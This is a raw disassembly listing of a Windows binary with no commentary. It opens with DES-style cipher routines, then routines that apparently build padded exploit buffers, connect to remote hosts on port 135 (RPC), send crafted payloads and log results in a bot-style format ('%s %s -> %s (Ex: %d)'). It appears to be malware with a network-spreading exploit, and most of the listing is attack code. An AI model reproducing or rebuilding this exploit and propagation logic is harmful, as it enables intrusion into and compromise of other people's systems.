loc_4034C4: ; CODE XREF: sub_403476+47�j
mov eax, [ebp+arg_0]
add eax, eax
loc_4034C9: ; CODE XREF: sub_403476+4C�j
lea ecx, [ebp+eax*4+var_F0]
lea esi, [ebp+eax*4+var_F4]
mov eax, [ebp+arg_0]
xor edx, edx
mov [ecx], ebx
mov [esi], ebx
movzx eax, byte ptr dword_43AE38[eax]
mov edi, eax
loc_4034E9: ; CODE XREF: sub_403476+8E�j
cmp edi, 1Ch
jge short loc_4034F4
mov bl, [ebp+edi+var_74]
jmp short loc_4034FB
; ---------------------------------------------------------------------------
loc_4034F4: ; CODE XREF: sub_403476+76�j
mov bl, [ebp+edi+var_90]
loc_4034FB: ; CODE XREF: sub_403476+7C�j
mov [ebp+edx+var_3C], bl
inc edx
inc edi
cmp edx, 1Ch
jl short loc_4034E9
push 1Ch
pop edi
add eax, edi
loc_40350B: ; CODE XREF: sub_403476+B0�j
cmp eax, 38h
jge short loc_403516
mov dl, [ebp+eax+var_74]
jmp short loc_40351D
; ---------------------------------------------------------------------------
loc_403516: ; CODE XREF: sub_403476+98�j
mov dl, [ebp+eax+var_90]
loc_40351D: ; CODE XREF: sub_403476+9E�j
mov [ebp+edi+var_3C], dl
inc edi
inc eax
cmp edi, 38h
jl short loc_40350B
xor ebx, ebx
xor eax, eax
loc_40352C: ; CODE XREF: sub_403476+E5�j
lea edx, dword_43AE60[eax]
movzx edi, byte ptr [edx-18h]
cmp [ebp+edi+var_3C], bl
jz short loc_403545
mov edi, dword_43ADA0[eax*4]
or [esi], edi
loc_403545: ; CODE XREF: sub_403476+C4�j
movzx edx, byte ptr [edx]
cmp [ebp+edx+var_3C], bl
jz short loc_403557
mov edx, dword_43ADA0[eax*4]
or [ecx], edx
loc_403557: ; CODE XREF: sub_403476+D6�j
inc eax
cmp eax, 18h
jl short loc_40352C
sub [ebp+var_4], 2
inc [ebp+arg_0]
cmp [ebp+var_4], 0FFFFFFFEh
jg loc_4034B9
lea eax, [ebp+var_F4]
push eax
call sub_403580
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_403476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403580 proc near ; CODE XREF: sub_403476+FF�p
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
push edi
lea edx, [ebp+var_84]
mov [ebp+var_4], 10h
loc_403599: ; CODE XREF: sub_403580+8D�j
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov eax, [eax]
mov ecx, [ecx]
mov esi, eax
and esi, 0FC0h
mov edi, eax
shl esi, 4
and edi, 0FC0000h
mov ebx, ecx
or esi, edi
mov edi, ecx
shr edi, 4
and edi, 0FC000h
and ebx, 0FC0h
or edi, ebx
shl esi, 6
shr edi, 6
or esi, edi
mov [edx], esi
mov esi, eax
and esi, 3Fh
and eax, 3F000h
shl esi, 4
or esi, eax
mov eax, ecx
shr eax, 4
shl esi, 0Ch
and eax, 3F00h
and ecx, 3Fh
or esi, eax
add edx, 4
or esi, ecx
mov [edx], esi
add edx, 4
dec [ebp+var_4]
jnz short loc_403599
lea eax, [ebp+var_84]
push eax
call sub_403621
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_403580 endp
; =============== S U B R O U T I N E =======================================
sub_403621 proc near ; CODE XREF: sub_403580+96�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, offset dword_454A38
loc_40362A: ; CODE XREF: sub_403621+18�j
mov edx, [ecx]
add ecx, 4
mov [eax], edx
add eax, 4
cmp eax, offset dword_454AB8
jb short loc_40362A
retn
sub_403621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40363C proc near ; CODE XREF: sub_407F26+49�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_40366C
lea eax, [ebp+var_8]
push offset dword_454A38
push eax
call sub_4036F2
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
call sub_4036B9
add esp, 18h
leave
retn
sub_40363C endp
; =============== S U B R O U T I N E =======================================
sub_40366C proc near ; CODE XREF: sub_40363C+C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
movzx edx, byte ptr [ecx]
shl edx, 18h
inc ecx
mov [eax], edx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
or [eax], edx
inc ecx
add eax, 4
movzx edx, byte ptr [ecx]
shl edx, 18h
inc ecx
mov [eax], edx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
mov edx, [eax]
movzx ecx, byte ptr [ecx+1]
or ecx, edx
mov [eax], ecx
retn
sub_40366C endp
; =============== S U B R O U T I N E =======================================
sub_4036B9 proc near ; CODE XREF: sub_40363C+26�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
mov dl, [ecx+3]
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov dl, [ecx]
inc eax
add ecx, 4
mov [eax], dl
mov dl, [ecx+3]
inc eax
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov cl, [ecx]
mov [eax+1], cl
retn
sub_4036B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036F2 proc near ; CODE XREF: sub_40363C+1A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edx, [eax]
mov ecx, [eax+4]
mov eax, edx
mov esi, 0F0F0F0Fh
shr eax, 4
mov edi, ecx
and eax, esi
and edi, esi
mov [ebp+var_4], 8
xor eax, edi
xor ecx, eax
shl eax, 4
xor edx, eax
mov esi, ecx
mov eax, edx
and esi, 0FFFFh
shr eax, 10h
xor eax, esi
mov esi, 33333333h
xor ecx, eax
shl eax, 10h
xor edx, eax
mov eax, ecx
shr eax, 2
mov edi, edx
and eax, esi
and edi, esi
mov esi, 0FF00FFh
xor eax, edi
xor edx, eax
shl eax, 2
xor ecx, eax
mov edi, edx
mov eax, ecx
and edi, esi
shr eax, 8
and eax, esi
xor eax, edi
xor edx, eax
shl eax, 8
xor ecx, eax
mov eax, ecx
add ecx, ecx
shr eax, 1Fh
or eax, ecx
mov ecx, eax
xor ecx, edx
and ecx, 0AAAAAAAAh
xor edx, ecx
xor eax, ecx
mov ecx, edx
add edx, edx
shr ecx, 1Fh
or ecx, edx
loc_403789: ; CODE XREF: sub_4036F2+1BA�j
mov edi, [ebp+arg_4]
mov esi, eax
mov edx, eax
shl esi, 1Ch
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
mov ebx, esi
shr edx, 18h
and edx, 3Fh
shr ebx, 10h
mov edx, dword_43AE78[edx*4]
and ebx, 3Fh
or edx, dword_43B078[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edx, dword_43B278[ebx*4]
or edx, dword_43B478[esi*4]
mov esi, [edi]
add edi, 4
xor esi, eax
mov [ebp+arg_4], edi
mov edi, esi
shr edi, 18h
mov ebx, esi
and edi, 3Fh
shr ebx, 10h
mov edi, dword_43AF78[edi*4]
and ebx, 3Fh
or edi, dword_43B178[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edi, dword_43B378[ebx*4]
or edi, dword_43B578[esi*4]
or edi, edx
xor ecx, edi
mov edi, [ebp+arg_4]
mov esi, ecx
mov edx, ecx
shl esi, 1Ch
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
mov ebx, esi
shr edx, 18h
and edx, 3Fh
shr ebx, 10h
mov edx, dword_43AE78[edx*4]
and ebx, 3Fh
or edx, dword_43B078[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edx, dword_43B278[ebx*4]
or edx, dword_43B478[esi*4]
mov esi, [edi]
add edi, 4
xor esi, ecx
mov [ebp+arg_4], edi
mov edi, esi
shr edi, 18h
mov ebx, esi
and edi, 3Fh
shr ebx, 10h
mov edi, dword_43AF78[edi*4]
and ebx, 3Fh
or edi, dword_43B178[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edi, dword_43B378[ebx*4]
and esi, 3Fh
or edi, dword_43B578[esi*4]
or edi, edx
xor eax, edi
dec [ebp+var_4]
jnz loc_403789
mov edx, eax
shl edx, 1Fh
shr eax, 1
or edx, eax
mov eax, edx
xor eax, ecx
and eax, 0AAAAAAAAh
xor ecx, eax
xor edx, eax
mov esi, ecx
mov edi, edx
shl esi, 1Fh
shr ecx, 1
or esi, ecx
mov ecx, 0FF00FFh
mov eax, esi
and edi, ecx
shr eax, 8
and eax, ecx
mov ecx, 33333333h
xor eax, edi
xor edx, eax
shl eax, 8
xor esi, eax
mov edi, edx
mov eax, esi
and edi, ecx
shr eax, 2
and eax, ecx
xor eax, edi
xor edx, eax
shl eax, 2
xor esi, eax
mov eax, edx
mov ecx, esi
shr eax, 10h
and ecx, 0FFFFh
xor eax, ecx
mov ecx, 0F0F0F0Fh
xor esi, eax
shl eax, 10h
xor edx, eax
mov edi, esi
mov eax, edx
and edi, ecx
shr eax, 4
and eax, ecx
mov ecx, [ebp+arg_0]
xor eax, edi
mov edi, eax
shl edi, 4
xor edi, edx
xor eax, esi
mov [ecx], edi
pop edi
pop esi
mov [ecx+4], eax
pop ebx
leave
retn
sub_4036F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403941 proc near ; CODE XREF: sub_403B6C+9A�p
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_C4 = dword ptr 0CCh
arg_C8 = dword ptr 0D0h
push ebp
mov ebp, esp
mov eax, 2004h
call sub_429A90
push esi
push edi
mov edi, dword_43BB98
mov esi, 0A7h
test edi, edi
mov [ebp+var_4], esi
jnz short loc_403969
xor eax, eax
jmp loc_403B68
; ---------------------------------------------------------------------------
loc_403969: ; CODE XREF: sub_403941+1F�j
push ebx
push 30h
lea eax, [ebp+var_2004]
push offset off_43BAB4
push eax
call sub_429350
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_429690
mov ebx, offset dword_43A8E8
push edi
lea eax, [ebp+var_1F2D]
push ebx
push eax
call sub_429350
lea esi, [edi+0D7h]
jmp short loc_4039E3
; ---------------------------------------------------------------------------
loc_4039A7: ; CODE XREF: sub_403941+B0�j
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push offset off_43BAB4
push eax
mov [ebp+var_4], esi
call sub_429350
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_429690
push edi
lea eax, [ebp+esi+var_1FD4]
push ebx
push eax
call sub_429350
lea esi, [esi+edi+30h]
loc_4039E3: ; CODE XREF: sub_403941+64�j
add esp, 24h
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_4039A7
cmp [ebp+arg_C8], 3
jnz short loc_403A12
push 4
lea eax, [ebp+var_1FE0]
push offset dword_43BB94
push eax
call sub_429350
add esp, 0Ch
loc_403A12: ; CODE XREF: sub_403941+B9�j
cmp [ebp+arg_C8], 2
jnz short loc_403A31
push 4
lea eax, [ebp+var_1FE0]
push offset dword_43BB90
push eax
call sub_429350
add esp, 0Ch
loc_403A31: ; CODE XREF: sub_403941+D8�j
push 360h
lea eax, [ebp+var_1004]
push offset dword_43B6C8
push eax
call sub_429350
push 10h
lea eax, [ebp+var_CA4]
push offset dword_43BA2C
push eax
call sub_429350
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_429350
lea edi, [esi+370h]
push 3Ch
push offset off_43BA40
lea eax, [ebp+edi+var_1004]
push eax
call sub_429350
add edi, 3Ch
push 30h
push offset dword_43BA80
lea eax, [ebp+edi+var_1004]
push eax
call sub_429350
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_4296E8
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_429690
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_429350
mov eax, [ebp+arg_C4]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_403B68: ; CODE XREF: sub_403941+23�j
pop edi
pop esi
leave
retn
sub_403941 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B6C proc near ; CODE XREF: sub_402646+174�p
; sub_406D50+1C5�p
; DATA XREF: ...
var_101C = byte ptr -101Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 101Ch
call sub_429A90
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
push 1
push eax
call sub_4044F6
mov esi, eax
xor ebx, ebx
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_403BA0
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4044F6
pop ecx
mov esi, eax
pop ecx
loc_403BA0: ; CODE XREF: sub_403B6C+23�j
cmp esi, 9
jz loc_403C7B
push ebx
push 1
push 2
call dword_456FB0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_403C7B
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_1C], 2
push 87h
call dword_456F18 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+arg_8]
push eax
call dword_456F5C ; inet_addr
mov [ebp+var_18], eax
lea eax, [ebp+var_C]
push esi
push eax
sub esp, 0C4h
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_403941
mov edi, eax
add esp, 0CCh
cmp edi, ebx
mov [ebp+var_8], edi
jnz short loc_403C1F
push [ebp+var_4]
jmp short loc_403C75
; ---------------------------------------------------------------------------
loc_403C1F: ; CODE XREF: sub_403B6C+AC�j
mov esi, [ebp+var_4]
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_403C6D
push ebx
push 48h
push offset dword_43B678
push esi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_403C6D
push ebx
lea eax, [ebp+var_101C]
push 1000h
push eax
push esi
call dword_456F38 ; recv
push ebx
push [ebp+var_C]
push edi
push esi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403C82
loc_403C6D: ; CODE XREF: sub_403B6C+C6�j
; sub_403B6C+DA�j
push edi
call sub_429822
pop ecx
push esi
loc_403C75: ; CODE XREF: sub_403B6C+B1�j
call dword_456FD0 ; closesocket
loc_403C7B: ; CODE XREF: sub_403B6C+37�j
; sub_403B6C+4E�j
xor eax, eax
jmp loc_403D50
; ---------------------------------------------------------------------------
loc_403C82: ; CODE XREF: sub_403B6C+FF�j
push 7D0h
call dword_43718C ; Sleep
movzx eax, word_443986
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_403D31
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_403D05
cmp [ebp+arg_BC], ebx
jnz short loc_403D0D
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_403D05: ; CODE XREF: sub_403B6C+16D�j
cmp [ebp+arg_BC], ebx
jz short loc_403D31
loc_403D0D: ; CODE XREF: sub_403B6C+175�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
loc_403D31: ; CODE XREF: sub_403B6C+146�j
; sub_403B6C+19F�j
push [ebp+var_8]
call sub_429822
pop ecx
push [ebp+var_4]
call dword_456FD0 ; closesocket
lea eax, [ebp+arg_8]
push eax
call sub_401E8E
xor eax, eax
pop ecx
inc eax
loc_403D50: ; CODE XREF: sub_403B6C+111�j
pop edi
pop esi
pop ebx
leave
retn
sub_403B6C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 197Ch
call sub_429A90
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
call sub_429690
push 2
lea eax, [ebp+10h]
pop esi
push eax
mov [ebp-14h], si
call sub_41E326
add esp, 10h
mov [ebp-10h], eax
push 87h
call dword_4372C0 ; ntohs
push edi
push edi
push edi
push 6
push 1
push esi
mov [ebp-12h], ax
call dword_4372C4 ; WSASocketA
mov ebx, eax
cmp ebx, edi
mov [ebp-4], ebx
jnz short loc_403DB6
push edi
call dword_437170 ; ExitThread
loc_403DB6: ; CODE XREF: .text:00403DAD�j
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call dword_4372C8 ; connect
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_403DCF
call dword_437170 ; ExitThread
loc_403DCF: ; CODE XREF: .text:00403DC7�j
push 48h
push offset dword_43BBA0
push ebx
call dword_4372CC ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_403DE9
call dword_437170 ; ExitThread
loc_403DE9: ; CODE XREF: .text:00403DE1�j
lea eax, [ebp-197Ch]
push 1000h
push eax
push ebx
call dword_4372D0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_403E08
push edi
call dword_437170 ; ExitThread
loc_403E08: ; CODE XREF: .text:00403DFF�j
mov ebx, 168h
loc_403E0D: ; CODE XREF: .text:00403E22�j
push 5Ah
push 41h
call sub_41E34F
mov [ebp+edi-17Ch], al
inc edi
pop ecx
cmp edi, ebx
pop ecx
jl short loc_403E0D
push 0Ah
lea eax, [ebp-90h]
push offset loc_43BC90
push eax
call sub_429350
push esi
lea eax, [ebp-86h]
push offset loc_43BCE0
push eax
call sub_429350
push 4
lea eax, [ebp-82h]
pop edi
push edi
push offset loc_43BCD8
push eax
call sub_429350
push esi
lea eax, [ebp-4Ah]
push offset loc_43BCDC
push eax
call sub_429350
push edi
lea eax, [ebp-46h]
push (offset loc_43BCD3+1)
push eax
call sub_429350
push 0Bh
lea eax, [ebp-42h]
push offset loc_43BC84
push eax
call sub_429350
add esp, 48h
lea eax, [ebp-97Ch]
push 18h
push offset dword_43BBEC
push eax
call sub_429350
push 44h
lea eax, [ebp-964h]
push offset dword_43BC08
push eax
call sub_429350
mov esi, 90h
push 20h
lea eax, [ebp-920h]
push esi
push eax
call sub_429690
push edi
lea eax, [ebp-900h]
push offset loc_43BC9C
push eax
call sub_429350
push edi
lea eax, [ebp-8FCh]
push offset loc_43BCD0
push eax
call sub_429350
push edi
lea eax, [ebp-8F8h]
push offset dword_43BCC8
push eax
call sub_429350
add esp, 48h
lea eax, [ebp-8F4h]
push edi
push offset loc_43BCCC
push eax
call sub_429350
push 58h
lea eax, [ebp-8F0h]
push esi
push eax
call sub_429690
push 6
lea eax, [ebp-898h]
push offset loc_43BCA4
push eax
call sub_429350
push 8
lea eax, [ebp-892h]
push esi
push eax
call sub_429690
push edi
lea eax, [ebp-88Ah]
push offset loc_43BCAC
push eax
call sub_429350
push edi
lea eax, [ebp-886h]
push esi
push eax
call sub_429690
add esp, 48h
lea eax, [ebp-882h]
push 6
push offset loc_43BCB4
push eax
call sub_429350
push 28Eh
lea eax, [ebp-87Ch]
push esi
push eax
call sub_429690
push 158h
lea eax, [ebp-5EEh]
push offset dword_43A8E8
push eax
call sub_429350
lea eax, [ebp-17Ch]
push ebx
push eax
lea eax, [ebp-496h]
push eax
call sub_429350
push 0Ah
lea eax, [ebp-32Eh]
push offset off_43BCBC
push eax
call sub_429350
push 32h
lea eax, [ebp-324h]
push offset dword_43BC50
push eax
call sub_429350
add esp, 48h
xor ebx, ebx
mov eax, 68Ah
mov dword ptr [ebp-96Ch], 672h
push ebx
mov [ebp-974h], eax
push eax
lea eax, [ebp-97Ch]
push eax
push dword ptr [ebp-4]
call dword_4372CC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_404015
push ebx
loc_40400F: ; DATA XREF: .text:0043B3E0�o
call dword_437170 ; ExitThread
loc_404015: ; CODE XREF: .text:0040400C�j
movzx eax, word_443986
push eax
lea esi, [ebp+10h]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz loc_4040C8
push 7D0h
call dword_43718C ; Sleep
mov edx, [ebp+0BCh]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+0CCh], ebx
mov ecx, [ecx]
jz short loc_40409C
cmp [ebp+0C4h], ebx
jnz short loc_4040A4
push ecx
lea ecx, [ebp+10h]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD84
mov edx, [ebp+0BCh]
add esp, 1Ch
loc_40409C: ; CODE XREF: .text:00404070�j
cmp [ebp+0C4h], ebx
jz short loc_4040C8
loc_4040A4: ; CODE XREF: .text:00404078�j
shl edx, 6
lea eax, [ebp+10h]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD0E
add esp, 1Ch
loc_4040C8: ; CODE XREF: .text:0040403A�j
; .text:004040A2�j
push ebx
lea eax, [ebp-197Ch]
push 1000h
push eax
push dword ptr [ebp-4]
call dword_4372D0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_4040EA
push ebx
call dword_437170 ; ExitThread
loc_4040EA: ; CODE XREF: .text:004040E1�j
push dword ptr [ebp-4]
call dword_4372D4 ; closesocket
lea eax, [ebp+10h]
push eax
call sub_401E8E
pop ecx
push 1
call dword_437170 ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404105 proc near ; CODE XREF: sub_406D50+25F�p
var_3020 = byte ptr -3020h
var_2020 = byte ptr -2020h
var_1FFC = byte ptr -1FFCh
var_1FF0 = byte ptr -1FF0h
var_1EA2 = byte ptr -1EA2h
var_1020 = byte ptr -1020h
var_1018 = dword ptr -1018h
var_1010 = dword ptr -1010h
var_FA0 = dword ptr -0FA0h
var_F9C = dword ptr -0F9Ch
var_F6C = dword ptr -0F6Ch
var_F68 = dword ptr -0F68h
var_F50 = dword ptr -0F50h
var_E94 = dword ptr -0E94h
var_CC0 = dword ptr -0CC0h
var_CB8 = dword ptr -0CB8h
var_CB0 = byte ptr -0CB0h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3020h
call sub_429A90
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
mov esi, 0A7h
push 1
push eax
mov [ebp+var_C], esi
call sub_4044F6
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jnz short loc_404141
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4044F6
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_404141: ; CODE XREF: sub_404105+2A�j
cmp [ebp+var_4], 1
jz loc_4044A2
cmp [ebp+var_4], 9
jz loc_4044A2
push 6
push 1
push 2
call dword_456FB0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_4044A2
push 10h
lea eax, [ebp+var_20]
push 0
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_20], 2
push 87h
call dword_456F18 ; ntohs
mov [ebp+var_1E], ax
lea eax, [ebp+arg_8]
push eax
call dword_456F5C ; inet_addr
mov [ebp+var_1C], eax
push 30h
lea eax, [ebp+var_2020]
push offset off_43C124
push eax
call sub_429350
push esi
lea eax, [ebp+var_1FF0]
push 0FFFFFF90h
push eax
call sub_429690
mov ebx, 158h
mov edi, offset dword_43A8E8
push ebx
lea eax, [ebp+var_1EA2]
push edi
push eax
call sub_429350
add esp, 24h
mov esi, 2D6h
loc_4041E1: ; CODE XREF: sub_404105+13A�j
inc esi
push esi
call sub_4296E8
mov esi, [ebp+var_C]
mov [ebp+var_10], eax
push 30h
lea eax, [ebp+var_2020]
inc esi
push offset off_43C124
push eax
mov [ebp+var_C], esi
call sub_429350
push esi
lea eax, [ebp+var_1FF0]
push 0FFFFFF90h
push eax
call sub_429690
push ebx
lea eax, [ebp+esi+var_1FF0]
push edi
push eax
call sub_429350
push [ebp+var_10]
add esi, 188h
call sub_429822
add esp, 2Ch
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_4041E1
cmp [ebp+var_4], 3
jnz short loc_40425D
push 4
lea eax, [ebp+var_1FFC]
push offset dword_43C204
push eax
call sub_429350
add esp, 0Ch
loc_40425D: ; CODE XREF: sub_404105+140�j
cmp [ebp+var_4], 2
jnz short loc_404279
push 4
lea eax, [ebp+var_1FFC]
push offset dword_43C200
push eax
call sub_429350
add esp, 0Ch
loc_404279: ; CODE XREF: sub_404105+15C�j
push 360h
lea eax, [ebp+var_1020]
push offset dword_43BD38
push eax
call sub_429350
push 10h
lea eax, [ebp+var_CC0]
push offset dword_43C09C
push eax
call sub_429350
lea eax, [ebp+var_2020]
push esi
push eax
lea eax, [ebp+var_CB0]
push eax
call sub_429350
lea edi, [esi+370h]
push 3Ch
push offset off_43C0B0
lea eax, [ebp+edi+var_1020]
push eax
call sub_429350
add edi, 3Ch
push 30h
push offset dword_43C0F0
lea eax, [ebp+edi+var_1020]
push eax
call sub_429350
mov eax, esi
add esp, 3Ch
cdq
sub eax, edx
push 10h
sar eax, 1
add [ebp+var_CC0], eax
add [ebp+var_CB8], eax
mov eax, [ebp+var_1018]
lea eax, [eax+esi-0Ch]
mov [ebp+var_1018], eax
mov eax, [ebp+var_1010]
lea eax, [eax+esi-0Ch]
mov [ebp+var_1010], eax
mov eax, [ebp+var_FA0]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FA0], eax
mov eax, [ebp+var_F9C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F9C], eax
mov eax, [ebp+var_F6C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F6C], eax
mov eax, [ebp+var_F68]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F68], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_E94]
lea eax, [eax+esi-0Ch]
mov esi, [ebp+var_8]
mov [ebp+var_E94], eax
lea eax, [ebp+var_20]
push eax
push esi
call dword_456E9C ; connect
